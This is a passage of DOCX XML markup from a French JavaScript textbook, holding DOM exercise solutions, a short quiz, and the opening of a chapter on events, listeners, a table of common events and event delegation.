      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le fragment n'est inséré qu'une fois : un seul recalcul de mise en page pour N éléments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 26.2</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const bouton = document.querySelector("#basculer");</w:t>
        <w:br/>
        <w:t>const panneau = document.querySelector("#panneau");</w:t>
        <w:br/>
        <w:br/>
        <w:t>bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const ouvert = bouton.getAttribute("aria-expanded") === "true";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.setAttribute("aria-expanded", String(!ouvert));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  panneau.hidden = ouvert;</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-expanded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflète l'état ouvert/fermé, et l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime réellement le panneau de l'arbre d'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Si le panneau contient un formulaire, veillez à ce que le focus ne reste pas dans un élément masqué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 26.3</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function afficher(items) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const fragment = document.createDocumentFragment();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (const item of items) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    li.textContent = item.nom;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fragment.append(li);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.replaceChildren(fragment);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>let minuteur;</w:t>
        <w:br/>
        <w:t>champ.addEventListener("input", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  clearTimeout(minuteur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minuteur = setTimeout(() =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    afficher(filtrer(e.target.value));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }, 200);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>replaceChildren</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vide et remplit en une opération, au lieu d'une boucle de suppressions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'anti-rebond évite de reconstruire la liste à chaque caractère : la recherche s'exécute 200 ms après la dernière frappe.</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Quelle propriété insère du texte sans interpréter le HTML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innerHTML</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textContent</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outerHTML</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insertAdjacentHTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie-t-il une liste vivante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Oui</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Non, elle est statique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Seulement en mode strict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Cela dépend du navigateur</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>classList.toggle("ouvert", true)</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Ajoute la classe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Retire la classe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Ajoute si absent, retire si présent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Remplace toutes les classes</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 xml:space="preserve">Pourquoi utiliser un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DocumentFragment</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Pour sécuriser le HTML</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Pour éviter un recalcul par insertion</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Pour créer un fichier</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Pour trier les éléments</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 devient un élément retiré du DOM mais référencé par une variable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Il est détruit immédiatement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Il reste en mémoire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Il revient dans le DOM</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Il provoque une erreur</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> traite la valeur comme du texte brut, ce qui empêche les injections.</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La </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est figée au moment de l'appel ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>getElementsByClassName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie au contraire une collection vivante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le second argument force l'ajout (true) ou le retrait (false) ; sans lui, la méthode bascule.</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Les insertions se font hors du document, puis une seule opération raccorde l'ensemble.</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Tant qu'une référence existe, l'élément n'est pas libéré : c'est une fuite mémoire potentielle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>27. Événements et interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Réagir aux actions de l'utilisateur : clics, clavier, formulaires et événements personnalisés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 26</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Écouter et retirer des écouteurs d'événements.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Comprendre la propagation et utiliser la délégation.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Gérer le clavier et le focus dans les composants interactifs.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Éviter les écouteurs en fuite et les manipulations coûteuses.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Construire un menu déroulant accessible complet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.1 Écouter un événement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> associe une fonction à un type d'événement sur un élément. L'écouteur reçoit un objet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui décrit l'action : cible, coordonnées, touche pressée, état des modificateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ajouter, retirer et limiter un écouteur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const bouton = document.querySelector("#envoyer");</w:t>
        <w:br/>
        <w:br/>
        <w:t>function gererClic(event) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  event.preventDefault();       // annule le comportement par défaut</w:t>
        <w:br/>
        <w:t xml:space="preserve">  console.log("Clic sur", event.currentTarget);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>bouton.addEventListener("click", gererClic);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Retirer l'écouteur : la fonction doit être nommée</w:t>
        <w:br/>
        <w:t>bouton.removeEventListener("click", gererClic);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Option : une seule exécution</w:t>
        <w:br/>
        <w:t>bouton.addEventListener("click", gererClic, { once: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.85 — Neuf événements courants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29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Événement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Déclencheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>click</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clic ou activation clavier</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Boutons, liens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Saisie dans un champ</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Validation en direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation du champ</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Select, cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Envoi de formulaire</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Traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>keydown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Touche pressée</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Raccourcis, Échap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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focus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Entrée/sortie de focus</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Aide contextuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Défilement</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En-tête collant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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resize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Redimensionnement</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Recalculs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DOMContentLoaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DOM analysé</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Initialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenche quand le DOM est construit, sans attendre les images. Un script chargé avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'exécute après cet événement : l'écouteur n'est donc pas nécessaire dans ce cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.2 Propagation et délégation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un événement se propage de la cible vers la racine (bouillonnement). C'est ce qui permet d'écouter un seul parent au lieu de chaque enfant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="37" name="Picture 37"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f35.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.35 — Les trois phases de propagation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux approches, un coût très différent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Sans délégation : un écouteur par élément</w:t>
        <w:br/>
        <w:t>document.querySelectorAll(".onglet").forEach(onglet =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  onglet.addEventListener("click", activer);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Avec délégation : un seul écouteur</w:t>
        <w:br/>
